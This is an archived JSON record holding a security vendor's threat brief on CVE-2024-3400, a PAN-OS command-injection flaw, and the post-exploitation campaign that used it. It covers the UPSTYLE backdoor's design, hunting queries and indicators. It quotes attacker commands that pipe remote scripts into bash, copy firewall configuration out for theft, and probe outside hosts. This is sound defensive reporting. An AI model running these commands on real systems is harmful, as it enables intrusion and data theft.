{
	"id": "dbb6ed94-76d8-4cf1-b6d9-b8f6dd7b36f0",
	"created_at": "2026-04-06T00:10:46.582177Z",
	"updated_at": "2026-04-10T03:37:59.062985Z",
	"deleted_at": null,
	"sha1_hash": "fa2349d8a5f0a8d211d60e45781ef4e01776981a",
	"title": "Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126467,
	"plain_text": "Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity\r\nRelated to CVE-2024-3400 (Updated May 20)\r\nBy Unit 42\r\nPublished: 2024-04-12 · Archived: 2026-04-05 14:14:42 UTC\r\nExecutive Summary\r\nThis threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is\r\nat the end of this post and offers the fullest account of all changes made.\r\nPalo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external\r\nresearchers, partners and customers to share information transparently and rapidly.\r\nA critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to\r\nexecute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of\r\n10.0.\r\nThis issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect\r\ngateway or GlobalProtect portal (or both). This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances\r\nor Prisma Access.\r\nFor up-to-date information about affected products and versions, please refer to the Palo Alto Networks Security Advisory\r\non this issue. Additionally, episode 21 of the Unit 42 podcast Threat Vector covers the discovery, technical details and\r\nexploitation of the vulnerability.\r\nPalo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Third\r\nparties have disclosed proofs of concept for this vulnerability. We are also aware of a proof of concept including post-exploit\r\npersistence techniques that survive resets and upgrades. We are not aware of any malicious attempts to use these persistence\r\ntechniques in active exploitation of the vulnerability at this time.\r\nWe are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse.\r\nThe section Current Scope of the Attack includes information on the types of exploitation activity we have seen, as well as\r\ntheir relative prevalence. The vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit\r\nthe vulnerability and some compromises of PAN-OS that are limited to confirming that the device is exploitable.\r\nOther cases have included the following activity:\r\nLimited attempts in which a file on the hard drive has been copied to a location accessible via a web request\r\nA very limited number of compromises that led to interactive command execution\r\nThis threat brief will cover information about the vulnerability and what we know about post-exploitation activity. We will\r\nshare guidance to mitigate the vulnerability, though readers should also refer to the Security Advisory for specific product\r\nversion information and remediation guidance. We will continue to update this threat brief as more information becomes\r\navailable.\r\nIf you believe your firewall has been compromised, please reach out to Palo Alto Networks support.\r\nThis issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3 and all later PAN-OS\r\nversions. Hotfixes for other commonly deployed maintenance releases are also available. Additional guidance on mitigation\r\nfor customers is available in the Security Advisory.\r\nA Knowledge Base article, How to Remedy CVE-2024-3400, is available in the Customer Support Portal.\r\nAs a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and\r\ninvestigate any unexpected network activity.\r\nWe would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference\r\nVolexity’s blog for their analysis.\r\nPalo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways:\r\nCustomers with a Threat Prevention subscription can block attacks for this vulnerability using Threat ID 95187, 95189 and\r\n95191 (available in Applications and Threats content version 8836-8695 and later). Our advisory has been updated with new\r\nThreat Prevention content updates for additional Threat Prevention IDs around CVE-2024-3400.\r\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/\r\nPage 1 of 8\n\nTo apply the Threat IDs, customers must ensure that vulnerability protection has been applied to their GlobalProtect\r\ninterface to prevent exploitation of this issue on their device. Please see the relevant LIVEcommunity article for more\r\ninformation.\r\nThe Managed Threat Hunting section below includes XQL queries that can be used to search for signs of exploitation of this\r\nCVE.\r\nDetails of the Vulnerability\r\nA command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute\r\narbitrary code with root privileges on the firewall. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both). \r\nPalo Alto Networks is aware of targeted attacks that leverage this vulnerability. The next section covers details of the post-exploitation activity we’ve observed.\r\nCurrent Scope of the Attack\r\nPalo Alto Networks has classified observations of attempted exploitation into several levels, from Level 0 to Level 3. In all\r\ncases we recommend following the guidance in the Security Advisory.\r\nLevel 0: Probe – An unsuccessful exploitation attempt. Forensic artifacts indicate that the attempt was made to access the\r\ncustomer network, but the attacker did not actually succeed. Palo Alto Networks assesses there is likely little to no\r\nimmediate impact of a Level 0 attempt.\r\nLevel 1: Test – The vulnerability was being tested on the device. A 0-byte file has been created and is resident on the\r\nfirewall. However, there is no indication of any known unauthorized command execution.\r\nLevel 2: Potential Exfiltration – A file on the device has been copied to a location accessible via a web request, though the\r\nfile may or may not have been subsequently downloaded. Typically, the file we have observed being copied is\r\nrunning_config.xml.\r\nLevel 3: Interactive Access – There are signs of interactive command execution. This may include shell-based backdoors,\r\nintroduction of code, downloading files or running commands.\r\nIt is important to note that the vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to\r\nexploit the vulnerability and some Level 1 compromises of PAN-OS. Other cases have included limited Level 2 and very\r\nlimited Level 3 compromises of those targeted firewalls.\r\nUPSTYLE and Cron Job Backdoor Activity\r\nAs part of the activity observed in Operation MidnightEclipse, the threat actor exploited CVE-2024-3400 to run commands\r\non the firewall. We have determined that the threat actor initially intended to install a Python-based backdoor, which our\r\ncolleagues at Volexity referred to as UPSTYLE.\r\nWe believe the threat actors created UPSTYLE specifically for this campaign. However, the threat actors were unsuccessful\r\nat installing UPSTYLE after three different exploit attempts. After the third failed attempt, the threat actor decided to install\r\na cron job backdoor to carry out their post-exploitation activities.\r\nAfter failing to install UPSTYLE, the threat actor was observed exploiting CVE-2024-3400 to run a handful of the\r\ncommands on the firewall. The commands included copying configuration files to the web application folder and exfiltrating\r\nthem via HTTP requests to those files.\r\nThe following IP address was seen attempting to access a specific configuration file copied to this folder, which we believe\r\nis a VPN used by the threat actor:\r\n66.235.168[.]222\r\nAfter gathering configuration files, the threat actor exploited the vulnerability to run the following command to receive\r\nadditional commands from an external server in the form of a bash script:\r\nwget -qO- hxxp://172.233.228[.]93/patch|bash\r\nWe were unable to access the bash script hosted at this URL. However, shortly after we saw evidence of the creation of a\r\ncron job. This cron job would run every minute to access commands hosted on the same external server that would execute\r\nvia bash, as seen in the following command:\r\nwget -qO- hxxp://172.233.228[.]93/policy | bash\r\nWe were unable to access the commands executed via this URL, but we believe this cron job-based backdoor was used to\r\ncarry out the actor’s post-exploitation activities.\r\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/\r\nPage 2 of 8\n\nWhile the threat actors were unable to install the UPSTYLE backdoor, it appears that they created it specifically for this\r\ncampaign and planned on using it as the initial backdoor. Also, the reason the actors failed to install UPSTYLE included\r\nmistakes in the exploit attempts themselves, as well as trivial mistakes in the executed commands. While we have not seen\r\nUPSTYLE used in any other exploit attempts, it is possible that UPSTYLE could have been successfully installed on other\r\ndevices.\r\nAs previously mentioned, the threat actors attempted three unsuccessful exploit attempts to run commands to install\r\nUPSTYLE. For two of these attempts, UPSTYLE was hosted at hxxp://144.172.79[.]92/update.py.\r\nIn the third exploit attempt, we saw the actor hosting the backdoor at nhdata.s3-us-west-2.amazonaws[.]com, which may\r\nsuggest that the actors thought network-based protections caused the first two failed installation attempts. According to the\r\nfollowing HTTP headers, it appears that the threat actor last modified UPSTYLE hosted at 144.172.79[.]92 on April 7, 2024:\r\nAccept-Ranges: bytes\r\nContent-Length: 5187\r\nContent-Type: application/octet-stream\r\nDate: Thu, 11 Apr 2024 16:12:16 GMT\r\nEtag: \"6612443d-1443\"\r\nLast-Modified: Sun, 07 Apr 2024 06:59:09 GMT\r\nServer: nginx/1.18.0 (Ubuntu)\r\nThe update.py file hosted at 144.172.79[.]92 has a SHA256 value of\r\n3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac. This file is a backdoor that has multiple layers.\r\nFirst, update.py writes another Python script to the following location:\r\n[snip]/site-packages/system.pth\r\nThe Python script written to system.pth Base64-decodes an embedded Python script and executes it. This embedded Python\r\nscript has two functions named protect and check, which are called in that order.\r\nThe protect function sends a SIGTERM signal and writes the contents of the system.pth file back to itself, likely as a\r\npersistence mechanism. The check function will read /proc/self/cmdline to see if it is running as monitor mp before running\r\nanother Base64 embedded Python script, which is the functional backdoor.\r\nThe Python script run by system.pth has a function named __main that will run in a thread. This function first reads the\r\ncontents of the following file, along with its access and modified times:\r\n[snip]/css/bootstrap.min.css\r\nIt then enters an infinite loop that iterates once every two seconds, reading in the following file:\r\n[snip]/sslvpn_ngx_error.log\r\nThe script will then iterate through each line of the file and search the line for the threat actor's command using the\r\nfollowing regular expression:\r\nimg\r\nIf the above regular expression matches, the script will Base64-encode the contents of the command and run it using the\r\npopen method within Python's OS module. The lines of the sslvpn_ngx_error.log file that do not match the regular\r\nexpression are written back to the file, which essentially prunes the lines that contain commands from persisting in the\r\nsslvpn_ngx_error.log file for later analysis.\r\nAfter running the command, the script writes the output of the command to the following file:\r\n[snip]/css/bootstrap.min.css\r\nThe script will then create another thread that runs a function called restore. The restore function takes the original content\r\nof the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original\r\ncontents back to the file. It then sets the access and modified times back to their original values.\r\nThe point of this function is to avoid leaving the output of the commands available for analysis. Also, this suggests that the\r\nthreat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before\r\nthe backdoor overwrites the file.\r\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/\r\nPage 3 of 8\n\nThe use of legitimate log files to receive commands and a legitimate CSS file to exfiltrate the command results suggests that\r\nthe threat actors developed this backdoor specifically to run on a compromised firewall.\r\nGuidance\r\nWe strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when\r\nworkarounds and mitigations have been applied.\r\nThis issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS\r\nversions. \r\nPlease see the frequently updated Palo Alto Networks Security Advisory on CVE-2024-3400 for information on hotfixes and\r\nthe most current guidance for mitigating this vulnerability. A Knowledge Base article, How to Remedy CVE-2024-3400, is\r\navailable in the Customer Support Portal.\r\nIn earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device\r\ntelemetry is no longer an effective mitigation. Device telemetry does not need to be enabled for PAN-OS firewalls to be\r\nexposed to attacks related to this vulnerability.\r\nUnit 42 Managed Threat Hunting Queries\r\nThe Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using\r\nCortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of\r\nexploitation.\r\n// Description: Search for domain IOC in raw NGFW logs\r\ndataset = panw_ngfw_url_raw\r\n| filter url_domain ~= \".*nhdata.s3-us-west-2.amazonaws.com\"\r\n| fields _time, log_source_name, action, app, url_domain, uri, url_category, source_ip, source_port, dest_ip,\r\ndest_port, protocol, rule_matched, rule_matched_uuid\r\n// Description: Detect hits for the specific prevention signature for CVE-2024-3400\r\nconfig case_sensitive = false\r\n| dataset = panw_ngfw_threat_raw\r\n| filter threat_id in (95187,95189,95191)\r\n| fields _time, log_source_name, action, app_category, app_sub_category, threat_id, threat_name, source_ip,\r\nsource_port, dest_ip, dest_port, *\r\n// Description: Hits for known IOCs in NGFW traffic\r\nconfig case_sensitive = false\r\n| dataset = panw_ngfw_traffic_raw\r\n| filter source_ip in\r\n(\"110.47.250.103\",\"126.227.76.24\",\"38.207.148.123\",\"147.45.70.100\",\"199.119.206.28\",\"38.181.70.3\",\"149.28.194.95\",\"78.141.232.174\",\"38.180.\r\nor dest_ip in\r\n(\"110.47.250.103\",\"126.227.76.24\",\"38.207.148.123\",\"147.45.70.100\",\"199.119.206.28\",\"38.181.70.3\",\"149.28.194.95\",\"78.141.232.174\",\"38.180.\r\n| fields _time, log_source_name, action, action_source, app, bytes_sent, bytes_received, bytes_total, source_ip, source_port, dest_ip, dest_port, proto\r\n// Description: Hits for known IOCs in XDR telemetry and NGFW telemetry (assuming proper integration of NGFW)\r\nconfig case_sensitive = false\r\n| dataset = xdr_data \r\n| filter event_type = ENUM.STORY\r\n| filter dst_action_external_hostname ~=\".*nhdata.s3-us-west-2.amazonaws.com\" OR\r\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/\r\nPage 4 of 8\n\ndns_query_name ~=\".*nhdata.s3-us-west-2.amazonaws.com\" OR\r\naction_external_hostname ~=\".*nhdata.s3-us-west-2.amazonaws.com\" OR\r\naction_remote_ip in\r\n(\"110.47.250.103\",\"126.227.76.24\",\"38.207.148.123\",\"147.45.70.100\",\"199.119.206.28\",\"38.181.70.3\",\"149.28.194.95\",\"78.141.232.174\",\"38.180.\r\n| fields _time, agent_hostname, actor_process_image_name, action_local_ip, action_remote_ip, action_remote_port, dns_query_name, action_extern\r\nAdditional Exploitation Observations\r\nWhile continuing to monitor efforts, we have observed additional IP addresses attempting to exploit CVE-2024-3400 based\r\non our Threat Prevention signature with a Threat ID 95187.\r\nWe have not seen any relationships between these indicators and those associated with Operation MidnightEclipse. We have\r\ngrouped the latter of these indicators exclusively to the activity involving exploitation of the zero-day vulnerability and the\r\nUPSTYLE backdoor.\r\nAs of writing this update, the following IP addresses have triggered the threat prevention signature:\r\n110.47.250[.]103\r\n126.227.76[.]24\r\n38.207.148[.]123\r\n147.45.70[.]100\r\n199.119.206[.]28\r\n38.181.70[.]3\r\n149.28.194[.]95\r\n78.141.232[.]174\r\n38.180.128[.]159\r\n64.176.226[.]203\r\n38.180.106[.]167\r\n173.255.223[.]159\r\n38.60.218[.]153\r\n185.108.105[.]110\r\n146.70.192[.]174\r\n149.88.27[.]212\r\n154.223.16[.]34\r\n38.180.41[.]251 \r\n203.160.86[.]91\r\n45.121.51[.]2\r\nFrom our analysis, we do not see any additional activity from these IP addresses outside probing the vulnerability to\r\ndetermine either if the firewall is vulnerable or compromised. We have seen the following commands within the exploit\r\nattempts that the threat prevention signature is blocking:\r\ntouch [snip]/global-protect/index.css\r\ntouch [snip]/global-protect/portal/css/test.min.css\r\ncp [snip]/running-config.xml [snip]/global-protect/[16 random characters].css\r\nThe commands above show two examples of the use of the touch command to create an empty file in the web application\r\nfolder. The client would then attempt to access this file via an HTTP request to determine if exploitation was successful. The\r\nthird command shows a bit more malicious behavior, which involves copying the running configuration to the web\r\napplication folder for access.\r\nWe have also seen probing attempts that use either wget or curl to access remote servers that an external party would use the\r\noutbound HTTP request to determine successful exploitation and command execution:\r\nwget srgsd1f.842b727ba4.ipv6.1433.eu[.]org\r\nwget edcjn.57fe6f5d9d.ipv6.1433.eu[.]org\r\ncurl srgsdf.842b727ba4.ipv6.1433.eu[.]org\r\nwget --no-check-certificate https://45.121.51[.]2/abc.txt\r\nConclusion\r\nThe Security Advisory will continue to provide up-to-date information on impacts to Palo Alto Networks products and\r\nrecommended mitigations. We will continue to update this threat brief with information on exploitation.\r\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/\r\nPage 5 of 8\n\nAgain, Palo Alto Networks would like to thank Volexity for finding this issue and their continuing coordination and\r\npartnership. Please reference Volexity's blog for their analysis.\r\nPalo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this\r\nintelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more\r\nabout the Cyber Threat Alliance.\r\nProtections and mitigations for the observed exploitation activity are below and will be updated as more become available.\r\nPalo Alto Networks Product Protections for CVE-2024-3400\r\nPalo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this\r\nthreat.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with Palo Alto Networks support.\r\nNext-Generation Firewalls and Prisma Access With Advanced Threat Prevention\r\nNext-Generation Firewall with the Advanced Threat Prevention security subscription can help block exploitation of CVE-2024-3400 via Threat Prevention signatures 95187, 95189 and 95191.\r\nCortex XDR, XSIAM and the Unified Cloud Agent \r\nCortex XDR and XSIAM agents and analytics help protect and detect against post-exploitation activity if an attacker tries to\r\nenumerate or laterally move to other assets.\r\nCortex Xpanse and XSIAM ASM Module\r\nCortex Xpanse has the ability to identify exposed Palo Alto Networks GlobalProtect devices on the public internet and\r\nescalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Palo Alto Networks\r\nGlobalProtect Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in\r\nthe incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM\r\nmodule.\r\nIndicators of Compromise\r\nUPSTYLE Backdoor\r\n3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\r\n5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078\r\nCommand and Control Infrastructure\r\n172.233.228[.]93\r\nhxxp://172.233.228[.]93/policy\r\nhxxp://172.233.228[.]93/patch\r\n66.235.168[.]222\r\nHosted Python Backdoor\r\n144.172.79[.]92\r\nnhdata.s3-us-west-2.amazonaws[.]com\r\nObserved Commands\r\nwget -qO- hxxp://172.233.228[.]93/patch|bash\r\nwget -qO- hxxp://172.233.228[.]93/policy | bash\r\n\"failed to unmarshal session(.\\+.\\/\" mp-log gpsvc.log* (Please see our Security Advisory for further information on\r\nthis command.)\r\nAdditional Resources\r\nUnderstanding the Midnight Eclipse Activity and CVE 2024-3400 – Unit 42 Threat Vector podcast, Episode 21, Palo\r\nAlto Networks\r\nHow to Remedy CVE-2024-3400 – Knowledge Base, Palo Alto Networks Customer Support Portal\r\nMore on the PAN-OS CVE-2024-3400 – Palo Alto Networks Blog\r\nCVE-2024-3400 PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect –\r\nPalo Alto Networks\r\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/\r\nPage 6 of 8\n\nZero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)\r\n– Volexity\r\nPalo Alto Networks Releases Guidance for Vulnerability in PAN-OS, CVE-2024-3400 – Cybersecurity and\r\nInfrastructure Security Agency (CISA)\r\nUpdate Log\r\nUpdated April 12, 2024, at 10:15 a.m. PT to add Cortex XDR and XSIAM product protections, as well as Additional\r\nResources.\r\nUpdated April 12, 2024, at 12:45 a.m. PT to add Cortex Xpanse product protections.\r\nUpdated April 14, 2024, at 11:05 a.m. PT to clarify impact on GlobalProtect portal configurations.\r\nUpdated April 14, 2024, at 7:55 p.m. PT to reflect that hotfixes are in place and ETAs added in our Security Advisory\r\nfor upcoming hotfixes.\r\nUpdated April 15, 2024, at 8:35 a.m. PT to update exploitation activity in Executive Summary.\r\nUpdated April 15, 2024, at 9:16 a.m. PT to update language on Threat ID 95187 in the Executive Summary, including\r\ninformation on firewalls managed by Panorama.\r\nUpdated April 16, 2024, at 7:45 a.m. PT to add Additional Exploitation Observations section with IoCs and\r\ncommands.\r\nUpdated April 16, 2024, at 9:48 a.m. PT to remove update.py filename from list of indicators.\r\nUpdated April 16, 2024, at 2:00 p.m. PT to update the Executive Summary and Mitigations section to add new\r\nmitigation guidance, a new Threat Prevention signature and availability of PAN-OS fixes.\r\nUpdated April 16, 2024, at 2:40 p.m. PT to align the Executive Summary and Details of the Vulnerability sections\r\nmore closely to the Security Advisory.\r\nUpdated April 17, 2024, at 6:15 a.m. PT to add Threat ID 95191.\r\nUpdated April 17, 2024, at 11:30 a.m. PT to add an additional bullet to the Observed Commands subsection.\r\nUpdated April 17, 2024, at 12:23 p.m. PT to clarify contact information.\r\nUpdated April 19, 2024, at 12:45 p.m. PT to heavily revise the Current Scope of Attack section as well the section on\r\nOperation MidnightEclipse activity (UPSTYLE and Cron Job Backdoor Activity).\r\nUpdated April 22, 2024, at 3:15 p.m. PT to more thoroughly define the levels of activity seen in the Current Scope of\r\nthe Attack section.\r\nUpdated April 23, 2024, at 7:40 a.m. PT to add language to recommendations for Level 2 and Level 3 in Scope of\r\nAttack section. Clarified language in Guidance section. Added Update Log section.\r\nUpdated Apr 24, 2024, at 7:10 a.m. PT to include a link to a Customer Support Portal Knowledge Base article.\r\nUpdated April 24, 2024, at 6:15 p.m. PT to include updated XQL queries for hits for known IoCs in NGFW traffic\r\nand in XDR telemetry and NGFW telemetry.\r\nUpdated April 25, 2024, at 8:00 a.m. PT to add Knowledge Base article to Additional Resources.\r\nUpdated April 26, 2024, at 12:22 p.m. PT for clarity and consistency.\r\nUpdated April 29, 2024, at 6:52 a.m. to add Unit 42 Threat Vector podcast on the vulnerability to Additional\r\nResources.\r\nUpdated April 29, 2024, at 11:55 a.m. PT to update exploitation status about proof of concept by third parties of post-exploit persistence techniques.\r\nUpdated May 1, 2024, at 8:05 a.m. PT for clarity and consistency.\r\nUpdated May 3, 2024, at 7:25 a.m. PT to note additional mitigation information for customers was added to the\r\nSecurity Advisory.\r\nUpdated May 20, 2024, at 8:10 a.m. PT to adjust second threat hunting query.\r\nTable of Contents\r\nExecutive Summary\r\nDetails of the Vulnerability\r\nCurrent Scope of the Attack\r\nUPSTYLE and Cron Job Backdoor Activity\r\nGuidance\r\nUnit 42 Managed Threat Hunting Queries\r\nAdditional Exploitation Observations\r\nConclusion\r\nPalo Alto Networks Product Protections for CVE-2024-3400\r\nNext-Generation Firewalls and Prisma Access With Advanced Threat Prevention\r\nCortex XDR, XSIAM and the Unified Cloud Agent\r\nCortex Xpanse and XSIAM ASM Module\r\nIndicators of Compromise\r\nUPSTYLE Backdoor\r\nCommand and Control Infrastructure\r\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/\r\nPage 7 of 8\n\nHosted Python Backdoor\r\nObserved Commands\r\nAdditional Resources\r\nUpdate Log\r\nRelated Articles\r\nWeaponizing the Protectors: TeamPCP’s Multi-Stage Supply Chain Attack on Security Infrastructure\r\nSuspected China-Based Espionage Operation Against Military Targets in Southeast Asia\r\nNation-State Actors Exploit Notepad++ Supply Chain\r\nEnlarged Image\r\nSource: https://unit42.paloaltonetworks.com/cve-2024-3400/\r\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cve-2024-3400/"
	],
	"report_names": [
		"cve-2024-3400"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "63883709-27b5-4b65-9aac-c782780fbb28",
			"created_at": "2026-04-10T02:00:03.996704Z",
			"updated_at": "2026-04-10T02:00:03.996704Z",
			"deleted_at": null,
			"main_name": "TeamPCP",
			"aliases": [],
			"source_name": "MISPGALAXY:TeamPCP",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434246,
	"ts_updated_at": 1775792279,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa2349d8a5f0a8d211d60e45781ef4e01776981a.pdf",
		"text": "https://archive.orkl.eu/fa2349d8a5f0a8d211d60e45781ef4e01776981a.txt",
		"img": "https://archive.orkl.eu/fa2349d8a5f0a8d211d60e45781ef4e01776981a.jpg"
	}
}